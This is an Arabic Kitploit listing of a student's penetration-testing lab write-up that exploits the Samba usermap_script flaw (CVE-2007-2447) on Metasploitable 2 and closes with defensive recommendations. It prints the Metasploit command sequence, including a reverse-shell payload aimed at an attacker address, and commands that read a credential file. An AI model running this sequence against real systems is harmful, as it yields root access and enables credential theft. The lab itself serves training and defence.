Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2 — مختبر اختبار اختراق خطوة بخطوة يستغل ثغرة Samba CVE-2007-2447 على Metasploitable 2 باستخدام Metasploit، يوضح اختراق الجذر، سرقة بيانات الاعتماد، وتسريب البيانات لتدريب الفريق الأحمر التعليمي. | Kitploit
أدوات/GitHubGitHub/devinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالتسريب البياناتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالتعلم والتعليممختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubdevinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

مختبر اختبار اختراق خطوة بخطوة يستغل ثغرة Samba CVE-2007-2447 على Metasploitable 2 باستخدام Metasploit، يوضح اختراق الجذر، سرقة بيانات الاعتماد، وتسريب البيانات لتدريب الفريق الأحمر التعليمي.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

RedTeam-SMB-PenTest

linux bash

الوصف


يوثق هذا المشروع مهمة اختبار الاختراق التي قمت بها كجزء من مقرر CMIT 386 في جامعة UMGC. يركز على استغلال ثغرة Samba SMB usermap_script (CVE-2007-2447) على جهاز Metasploitable 2 باستخدام Metasploit من جهاز هجوم Kali Linux. يُظهر هذا الإثبات المفاهيمي كيف يمكن لثغرة قديمة أن تؤدي إلى اختراق كامل للنظام، وسرقة بيانات الاعتماد، وسحب البيانات.

نظرة عامة على الثغرة

تقع الثغرة في خدمة Samba على المنفذ 445، حيث يسمح المعالجة غير الصحيحة للإدخال في سكربت خريطة اسم المستخدم بتنفيذ أوامر عن بعد دون مصادقة. إذا تم استغلالها، فإنها توفر للمهاجم وصولاً على مستوى الجذر (root) إلى شل.

البيئة

الخطوات المتبعة

1. تشغيل Metasploit:

root@kitploit:~
msfconsole


تأكد من تشغيل جهاز المهاجم والجهاز الضحية.

2. البحث عن الأداة:

root@kitploit:~
search samba

3. استخدام الوحدة المناسبة:

root@kitploit:~
use exploit/multi/samba/usermap_script

4. تعيين الخيارات المطلوبة:

root@kitploit:~
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse

5. تنفيذ الأداة:

root@kitploit:~
exploit

6. أوامر ما بعد الاستغلال:

root@kitploit:~
whoami
hostname
cd /redteam7/student3
cat mypass.txt

تعليمات إعادة الضبط

إذا توقفت الجلسة أو تعطلت:

إعادة ضبط Metasploit:

root@kitploit:~
# الخروج من الشل الحالي
Ctrl C
exit
# قتل جميع المهام الخلفية
sessions -K             
jobs -K
# إعادة تشغيل Metasploit
msfconsole              

النقاط الرئيسية

  • الخدمات القديمة مثل Samba 3.0.20 مع usermap_script شديدة الضعف.
  • استغلال هذه الثغرة في SMB يمنح وصولاً على مستوى الجذر (root) إلى شل.
  • يمكن سرقة البيانات الحساسة بأوامر بسيطة، مما يوضح المخاطر الواقعية.
  • يثبت هذا ضرورة التحديث، والتقسيم الشبكي، وتقليل تعرض الخدمات.

التوصيات

  • تحديث أو إيقاف تشغيل الأنظمة القديمة فوراً.
  • تطبيق تقسيم شبكي صارم وقواعد جدار ناري.
  • تقييد تعرض SMB للمستخدمين الداخليين الموثوقين فقط.
  • مراقبة السجلات بحثاً عن نشاط مشبوه وحركة جانبية.

المراجع

  • Metasploit Samba usermap_script
  • CVE-2007-2447 Details
  • Metasploitable 2 Exploit Index
تنزيل الأداة
المكونالتفاصيل
جهاز المهاجمKali Linux
الجهاز الضحيةMetasploitable 2
المنفذ المستهدف445 (Samba/SMB)
الأداة المستخدمةexploit/multi/samba/usermap_script
هدف بيانات الاعتماد/redteam7/student3/mypass.txt